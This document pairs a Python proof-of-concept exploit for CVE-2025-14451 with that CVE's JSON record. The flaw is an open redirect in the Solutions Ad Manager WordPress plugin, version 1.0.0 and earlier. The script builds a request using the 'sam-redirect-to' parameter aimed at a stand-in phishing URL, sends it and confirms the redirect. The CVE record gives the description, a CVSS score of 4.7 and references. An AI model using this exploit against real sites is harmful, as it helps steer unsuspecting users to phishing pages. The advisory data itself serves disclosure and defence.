CVE-2025-14451

import requests # CVE-2025-14451 PoC - Open Redirect in Solutions Ad Manager WordPress Plugin # Target: WordPress site with Solutions Ad Manager plugin <= 1.0.0 def exploit_open_redirect(target_url, redirect_target): """ Exploits the open redirect vulnerability in sam-redirect-to parameter Args: target_url: Base URL of the WordPress site redirect_target: Malicious URL to redirect users to """ # Construct malicious URL with sam-redirect-to parameter # The vulnerable parameter is 'sam-redirect-to' exploit_url = f"{target_url}?sam-redirect-to={redirect_target}" print(f"[*] Target: {target_url}") print(f"[*] Malicious Redirect Target: {redirect_target}") print(f"[*] Exploit URL: {exploit_url}") # Send request to trigger redirect try: response = requests.get(exploit_url, allow_redirects=False) # Check for redirect response if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') print(f"[+] Open Redirect Confirmed!") print(f"[+] Status Code: {response.status_code}") print(f"[+] Location Header: {location}") # Verify redirect goes to attacker-controlled domain if redirect_target in location or redirect_target in exploit_url: print("[+] Vulnerability successfully exploited!") return True else: print(f"[-] Unexpected response: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Example usage if __name__ == "__main__": target = "http://example.com/wp-content/plugins/solutions-ad-manager/public/" malicious_url = "https://attacker-controlled-site.com/phishing" exploit_open_redirect(target, malicious_url)

{"cve": {"id": "CVE-2025-14451", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:50.013", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Solutions Ad Manager plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.0.0. This is due to insufficient validation on the redirect URL supplied via the 'sam-redirect-to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/solutions-ad-manager/tags/1.0.0/public/class-solutions-ad-manager-public.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/solutions-ad-manager/trunk/public/class-solutions-ad-manager-public.php#L30", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/696495c5-c8f8-4790-af89-1ee911767b1b?source=cve", "source": "[email protected]"}]}}